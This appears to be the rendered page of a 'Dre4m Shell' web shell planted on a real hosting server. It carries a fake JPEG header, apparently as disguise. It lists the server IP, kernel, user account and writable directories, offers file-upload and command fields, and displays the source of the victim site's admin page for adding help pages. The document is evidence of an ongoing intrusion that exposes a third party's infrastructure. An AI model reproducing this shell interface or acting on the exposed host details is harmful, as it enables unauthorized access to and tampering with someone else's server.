ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/litsolide.com/cp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/litsolide.com/cp-admin/volet_add.php
<?php
include_once('includes/header.php');

if (isset($_POST['add'])) {
  $qid = $bdd->prepare("INSERT INTO " . $GLOBALS['db_table']['volet'] . " (page) VALUES (:page)");
  $qid->execute(array(  'page' => $_POST['title']));




  echo '<script>';
  echo 'window.location = "./volet_add.php"';
  echo '</script>';
}

?>

<div class="container">
  <form class="form-horizontal" method="post" action="#" enctype="multipart/form-data">
    <div class="row">
    	<div class="span12">
      	<div class="page-header">
       	 	<h1>Ajouter Page Aide
       	 		<div class="pull-right">
              <button type="submit" name="add" class="btn btn-success"><i class="icon-ok"></i> Enregistrer</button>
        			<a href="volet_list.php" class="btn btn-primary"><i class="icon-arrow-left"></i> Voir Edition</a>
      			</div>
      		</h1>
        </div>
      </div>
    </div>

    <?php
    echo '<div id="form-content" style="">';
	    echo '<div class="row-fluid">';
        // Partie de gauche
        echo '<div class="span6">';

          echo '<div class="control-group">';
            echo '<label class="control-label" for="title">Nom page :</label>';
            echo '<div class="controls">';
              echo '<input required style="width:287px" name="title" type="text">';
            echo '</div>';
          echo '</div>';
    ?>
  </form>
</div>

<script type="text/javascript" src="assets/js/chosen.jquery.js" ></script>
<script type="text/javascript">
    var config = {
        '.chosen-select'           : {},
        '.chosen-select-deselect'  : {allow_single_deselect:true},
        '.chosen-select-no-single' : {disable_search_threshold:10},
        '.chosen-select-no-results': {no_results_text:'Oops, nothing found!'},
        '.chosen-select-width'     : {width:"95%"}
    }
    for (var selector in config) {
        $(selector).chosen(config[selector]);
    }
</script>

<?
include_once('includes/footer.php');
?>

Anon7 - 2022
AnonSec Team